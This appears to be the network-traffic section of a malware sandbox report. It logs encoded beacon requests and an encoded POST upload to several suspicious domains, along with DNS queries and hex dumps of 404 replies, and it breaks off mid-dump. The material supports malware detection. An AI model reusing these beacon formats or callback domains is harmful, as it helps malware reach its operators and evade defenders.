                Source: global trafficHTTP traffic detected: GET /ydza/?PLpD=YQDMT/cjjLIrhYhTk0Qcn1c+4/vXTHer2WGK9Y1kX6vo8j7CWoL4SlIzIlGkR2TnTHSV+ODB3q8FGPL6osY1BIA0voRLPdIJFDITNJjOTEnO/NX/dE7RBJTjciFlPthnKg==&dfxXf=5pgPlrExEj HTTP/1.1Host: www.taxitayninh365.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                Source: global trafficHTTP traffic detected: GET /fsgl/?PLpD=C9QsHkK47GSD7r6TBBJA1A1gthYOFQJYbFs9cpfO+uKQdjQ23Lhhb84Ia8cTOlIJgW821ZMigtRpVm/E2N9FpRWGdFmoqY0sqDryt//frta9xBWKUdk1ZjTnobcgzZTMuw==&dfxXf=5pgPlrExEj HTTP/1.1Host: www.rtpmesinkoin.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                Source: global trafficHTTP traffic detected: GET /cbfz/?PLpD=wkx2NXiTkimKkWVEm8IW4C4huKMmJZN5WgEr82Da3v6V9hQpjwkjAwPIlceTp9yKNyaCzMrAs840f3u2xWNXdTvTMZn4meFjRqcHxGrlREZ38HV0x/J+b0VjoEphiZZaRg==&dfxXf=5pgPlrExEj HTTP/1.1Host: www.cortisalincontrol.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                Source: global trafficHTTP traffic detected: GET /fqxx/?PLpD=EQE6/f8JwKBVpYrNkw4Fqaku42g/bdfb0nglp3s8GuOVuBTyHurIT2AdZcstinw02q63t984fSctf9ZXgFK3z9ursJZ5jisJa4HYxh49r+T+FoVNmB7Fsft7Yvb0T4abVw==&dfxXf=5pgPlrExEj HTTP/1.1Host: www.carsten.studioAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                Source: global trafficHTTP traffic detected: GET /lqxd/?PLpD=wYwrhtOuglxnIn28LlpI4+LrVvqM62/DKK1NgpC20GbgYEDR8w6xmbtuhBCgj8a/1RMYy9cnrRcVYl1JPFOGzEFXxYAuHOIed0EYkcd0fYA++UMHJ9G8Ni1crzSH6uPj0A==&dfxXf=5pgPlrExEj HTTP/1.1Host: www.conseilnsaftogo.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
                Source: global trafficDNS traffic detected: DNS query: www.5tuohbpzyj9.buzz
                Source: global trafficDNS traffic detected: DNS query: www.canadavinreport.site
                Source: global trafficDNS traffic detected: DNS query: www.phoenix88.sbs
                Source: global trafficDNS traffic detected: DNS query: www.ana-silverco.shop
                Source: global trafficDNS traffic detected: DNS query: www.gadgetre.info
                Source: global trafficDNS traffic detected: DNS query: www.acc888ommodate.xyz
                Source: global trafficDNS traffic detected: DNS query: www.nb-shenshi.buzz
                Source: global trafficDNS traffic detected: DNS query: www.taxitayninh365.site
                Source: global trafficDNS traffic detected: DNS query: www.rtpmesinkoin.click
                Source: global trafficDNS traffic detected: DNS query: www.cortisalincontrol.net
                Source: global trafficDNS traffic detected: DNS query: www.carsten.studio
                Source: global trafficDNS traffic detected: DNS query: www.conseilnsaftogo.org
                Source: unknownHTTP traffic detected: POST /abgi/ HTTP/1.1Host: www.5tuohbpzyj9.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Origin: http://www.5tuohbpzyj9.buzzContent-Length: 205Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedReferer: http://www.5tuohbpzyj9.buzz/abgi/User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+Data Raw: 50 4c 70 44 3d 47 71 45 39 64 77 56 65 7a 49 48 62 35 61 4d 6c 59 75 6d 48 52 4e 77 34 34 75 5a 46 4e 69 32 61 53 58 66 52 6a 35 35 36 6c 2f 4d 46 30 54 31 4a 4a 7a 41 70 32 75 4a 54 48 55 61 59 42 6e 79 51 57 46 4c 66 45 4c 56 59 79 52 42 4f 53 4d 47 51 79 78 4b 6b 4e 2b 4b 61 6f 55 6c 39 48 56 62 71 6d 4e 4a 50 45 31 47 6f 66 59 48 69 33 73 44 73 72 43 50 34 56 6d 65 79 47 42 43 49 64 64 75 50 56 42 5a 38 79 77 61 63 6e 4f 35 59 48 75 72 50 38 4d 67 77 58 74 33 34 37 47 63 67 30 6e 53 2b 63 4b 59 32 32 67 67 59 63 31 71 4b 4b 58 62 6e 31 35 47 53 59 77 46 48 43 36 4c 64 57 6c 6a 2f 68 43 68 67 71 6d 6f 3d Data Ascii: PLpD=GqE9dwVezIHb5aMlYumHRNw44uZFNi2aSXfRj556l/MF0T1JJzAp2uJTHUaYBnyQWFLfELVYyRBOSMGQyxKkN+KaoUl9HVbqmNJPE1GofYHi3sDsrCP4VmeyGBCIdduPVBZ8ywacnO5YHurP8MgwXt347Gcg0nS+cKY22ggYc1qKKXbn15GSYwFHC6LdWlj/hChgqmo=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:14:26 GMTContent-Type: text/htmlContent-Length: 566Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:15:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QuQ28zMlLhMf3STm%2FMgDZeBJc9XsH%2FfielDLeo4BCnHRgJVxGlnr%2BqzxCP2Im0gIxfNdYK2obgH4D2zlo1fy6cOervsCJjbNi0rPO84zwaYTJh%2FKVfBOS3PfngqJmzt2cCrhE1wwEEY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3d2c369bf4267-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1780&min_rtt=1780&rtt_var=890&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:15:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yifU1v40o8fTdV3Zs3b2P18PDLNEYrPvB1HG9X%2Bsh65KhXdIVf1JAMPakORvKENE31iZi%2F4WK7bRjF3mcAogXTNRFHMhLwlujyVMQ2fM6Be%2FYXl%2B9NPV%2BP5tR7hsh9JIa0%2Fi6DJbodg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3d2d469414411-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1728&min_rtt=1728&rtt_var=864&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=810&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:15:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HK5PlL1RGfY4E7sUlYpbS8mm%2F%2B5sbTATUBxuHpfZzg%2BdQ%2FpYwrZN94UrhpzbOxp%2FTeZ1BDKKUbBlqkz4GPn1fd7%2B06eOWk4oV6Zl1gE2HKRZlwkAIPSWFdtjhpIcFK4TiKFZoHwNNeg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3d2e5495f17a9-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1628&min_rtt=1628&rtt_var=814&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1827&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:15:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cz28Kz1C0Xnmh7a42Hr1UnohzWD%2F4VS7HIqhfRUUgycNlUyhoU27WE%2BTysB9dd02Ent4QYVg3guDvN4bVHerodzHsAVjZpAczdqmfZy7JR3gA3NeuRPYW25Q5bpT75ggWLz8Zo7vwdE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3d2f60e1841bd-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1715&rtt_var=857&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=525&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:15:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:15:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:15:26 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:15:33 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:15:36 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:15:38 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:15:41 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:15:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 